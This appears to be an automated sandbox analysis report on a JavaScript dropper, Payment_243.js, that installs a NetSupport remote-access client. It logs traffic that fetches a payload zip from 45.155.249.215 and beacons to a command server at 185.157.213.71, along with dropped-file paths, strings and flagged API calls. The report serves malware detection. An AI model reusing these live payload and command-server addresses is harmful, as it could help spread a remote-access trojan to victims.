                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0 (Ubuntu)Date: Tue, 14 Jan 2025 15:21:08 GMTContent-Type: application/zipContent-Length: 2845498Connection: keep-aliveLast-Modified: Mon, 13 Jan 2025 16:08:22 GMTETag: "2b6b3a-62b98a754cee9"Accept-Ranges: bytesData Raw: 50 4b 03 04 0a 00 00 00 00 00 44 77 2a 5a 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 69 6e 73 74 61 6c 6c 2f 50 4b 03 04 14 00 00 00 08 00 0b 50 29 5a 14 81 51 7e 86 b5 00 00 7c b5 00 00 19 00 00 00 69 6e 73 74 61 6c 6c 2f 35 42 38 46 45 42 32 41 46 38 31 37 34 39 33 45 73 00 05 80 fa 7f 54 44 46 24 51 72 4c 00 00 00 b5 60 88 47 af 1c 6c 35 ca ca 04 4a ee 30 0b ac fc 54 a5 52 80 93 43 4f 67 b0 e8 c6 b3 c1 a1 91 b9 e6 b0 db 7f 3a ed 1f 97 37 3c 2d 12 23 9a 03 a0 82 51 20 90 c6 b0 1d 28 dc 14 8f fa 4d 65 17 fa 2e bd 9a 1b 49 df 54 25 51 81 a0 e5 e3 c9 7d 48 92 3b c0 c1 12 bd 33 4b df 7f 70 4d ec ab 00 6a 2b 1d 0d 4a 4a ac bb 29 9d 51 7e dd e3 78 3f d4 f6 44 c4 65 d3 f9 26 7e c5 a4 cb 66 92 18 15 e3 07 28 f4 6e 21 9f 76 0e 33 83 6f 05 6a f0 f7 f1 25 7b f8 13 9d e3 c3 62 a1 d8 a2 d1 3e 0c 9d 79 11 10 09 de 7a c7 88 00 c4 9b a4 91 db a9 9b 0e 8a 99 90 7a 0d 00 de ac 45 3e 0d 8d a6 e7 f8 f0 48 4a 44 ff 41 c2 5d d2 ff 79 dc 7b 7e 86 77 78 a6 08 5e 55 f9 3c b4 77 ca 4c 83 b5 7e aa c9 6a 16 d5 5b a8 68 3c 3a 02 2c cf 10 8a 62 b0 99 16 dd a8 dd bb 79 62 12 9c 92 85 59 06 be d8 60 59 e3 f2 30 c1 46 aa 00 fa 8f 59 9d eb de 5c 85 0e 15 d1 9b 9d ae fc 46 4a e9 1c 83 15 63 ac 9c 98 84 7b 80 9a 6e 65 9e f5 21 1b e2 38 39 15 d1 e5 5a 05 19 f2 f4 a4 11 8d 61 2a 73 69 9e b5 ee 0a aa a6 c7 bd 0d 5d b3 ca 1b ea 4e a3 4d e1 44 79 3b 52 44 5b ae fe 89 6d 23 3f 0b de 5c e7 20 64 bd 1b c2 8a ba 9f ec e6 f5 77 f7 84 54 d5 b8 50 a8 08 12 60 47 06 93 fe 56 86 a0 71 c2 50 64 89 bf 67 bb fc 20 38 5b 88 08 c7 0a 32 5e 1e 90 7e 34 23 5e e8 a3 82 6b ff 89 53 8a 35 fb a4 e5 7b 7b ca 29 57 c8 32 7f 26 19 ee 50 97 47 31 4c 5e 59 af 27 b7 51 18 d6 74 2f 83 f4 05 7e 23 7e 7a c8 39 a8 05 86 3a 8e cb f4 ed c3 3b 74 95 08 49 f2 c3 03 62 e9 85 67 64 20 e8 1e e2 54 0a 83 0a ba 23 c1 a9 d7 0e f0 3f 41 09 ee d2 7e ef 66 dd 25 b4 d7 55 e3 08 ee 42 cf 2f fa d0 88 a3 9e d4 f5 c1 b8 c4 67 3f 37 64 e9 97 24 b3 29 d3 d6 c7 ad c1 f8 7b 42 85 1e 23 cb 45 19 f4 08 92 34 f7 4e 07 b5 18 8c 3a fb de 13 6d 4d ca 5d 97 4c 44 77 a6 43 cc 41 9b 37 ee ab 7a 8f e9 29 52 e7 71 69 2d c1 b3 6a d9 af 7e 33 45 c2 03 b8 07 65 2b 18 71 32 ad b9 9f 7d 27 f4 7b a5 f9 22 27 80 57 b9 0e 14 08 e0 7b 5d 7c f6 67 4b 0e f2 8a 79 41 db f8 3b b4 78 dc 32 e2 9a 0c 59 e4 cb 78 d4 05 69 50 d8 9d 4a d9 49 8d ba fb 04 5d f9 f4 e1 fe b1 16 d9 dc bf 3b 80 c4 54 4b 81 ff 25 f1 b1 62 14 84 98 7a ee 2b 1f 61 83 bb 90 8b 51 f2 d9 c5 24 f1 84 e6 72 d7 4d 4e 4c b3 d5 c3 40 ac 53 ae 34 3b fe 12 98 61 eb 8d a3 6e ba 4f 6d 3d ad ea 02 82 6f 43 6d 2c 60 6f 86 b3 bc 51 f3 28 14 0c a9 dc f5 ec 26 fd 70 0d 54 f0 59 0b 9c ff df fd 1a bb ae e3 f7 70 ca 84 07 3c 61 e9 23 78 d2 68 51 c8 43 11 4e 22 69 75 88 bd 66 99 cd 41 c6 23 fd ee 43 53 96 34 33 4e 0f ed 74 ad 48 63 67 07
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xxx[1].zipJump to behavior
                                Source: global trafficHTTP traffic detected: GET /xxx.zip?mt=6364 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.155.249.215Connection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST http://185.157.213.71/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 185.157.213.71Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 15:21:19 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 901e9d7529d1c988-IADCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gc3oIBvBtUgM8YAwbRN48w5AsnTbnCGPG4HIQT2ZB6J88m7vBx2lZz2S2l%2BsemwJa2rW0KJwidk18w5jAANvtDPuVpiETPEm4TD0tqhBVYG%2BwMN9jSkP85%2BAMInOnFYS7d7Zi5r4PtBHFeCd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=8080&min_rtt=8080&rtt_var=4040&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 15:21:20 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 901e9d7bedff0f37-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kv9TaLead1UM8xuCNbW5bbNocBjfRxR77Xi1neXV%2FjpNe6%2FpYbFfDPPkOJzct6zd%2FEhAt%2Fm%2FoRe3OIbFNrrYb9Dv7JMdUVy9Sq4tNVR2%2FGE8XIqWXIX7fXyei70qyxJmBXBhkM1TPoBC5NpR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1482&min_rtt=1482&rtt_var=741&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 15:21:20 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 901e9d804f440c92-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3SEZmome8uga32gP%2FZMtXcxpGi%2BtdRASRvM4EkIhhWM%2FwtTuCdV3BPbNrHTGnDFM26lQ2%2FNTNhwt56JEbpbT4xQGDGmlikULEjJMaPDiEbmpk6NnNSw%2FKJWQdpQXzWszGDHhAZs6fqvrFOK%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1528&min_rtt=1528&rtt_var=764&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: client32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/fakeurl.htm
                                Source: client32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htm
                                Source: client32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: Payment_243.jsString found in binary or memory: http://0.30000000000000004.com/
                                Source: client32.exe, client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1
                                Source: client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: wscript.exe, 00000000.00000003.394805802.0000000006D4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.394015277.0000000004380000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.394206715.0000000004B20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.394139946.0000000002E80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.155.249.215/xxx.zip?mt=6364
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                                Source: client32.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                                Source: client32.exe, 00000004.00000002.670510259.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: client32.exe, 00000004.00000002.670510259.00000000004F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp&
                                Source: client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://ocsp.digicert.com0O
                                Source: client32.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: http://s2.symcb.com0
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: http://sv.symcd.com0&
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://t2.symcb.com0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://tl.symcb.com/tl.crl0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://tl.symcb.com/tl.crt0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://tl.symcd.com0&
                                Source: client32.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                Source: client32.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                Source: client32.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                Source: Payment_243.jsString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
                                Source: client32.exe, 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530116570.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547708086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: client32.exe, 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530116570.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547708086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(L
                                Source: client32.exe.0.drString found in binary or memory: http://www.netsupportsoftware.com
                                Source: client32.exe, 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530116570.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547708086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/support
                                Source: client32.exe, 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530116570.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547708086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: Payment_243.jsString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalCompositeOperation
                                Source: Payment_243.jsString found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js
                                Source: Payment_243.jsString found in binary or memory: https://github.com/ecomfe/zrender/blob/master/LICENSE.txt
                                Source: Payment_243.jsString found in binary or memory: https://jsbench.me/2vkpcekkvw/1)
                                Source: Payment_243.jsString found in binary or memory: https://momentjs.com/
                                Source: Payment_243.jsString found in binary or memory: https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: https://www.thawte.com/cps0/
                                Source: webmvorbisencoder.dll.0.drString found in binary or memory: https://www.thawte.com/repository0W
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,4_2_1101FC20
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_110335A0 GetClipboardFormatNameA,SetClipboardData,4_2_110335A0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,4_2_1101FC20
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11033320 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock,4_2_11033320
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_110077A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,4_2_110077A0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,4_2_11114590
                                Source: Yara matchFile source: 8.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 3748, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 3908, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 3992, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\x225qa0\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,4_2_111165C0

                                System Summary

                                barindex
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\ProgIDJump to behavior
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11113190: GetKeyState,DeviceIoControl,keybd_event,4_2_11113190
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1115EA00 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,4_2_1115EA00
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D9F4
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102DD21
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_110736804_2_11073680
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11029BB04_2_11029BB0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_110627B04_2_110627B0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1111C9904_2_1111C990
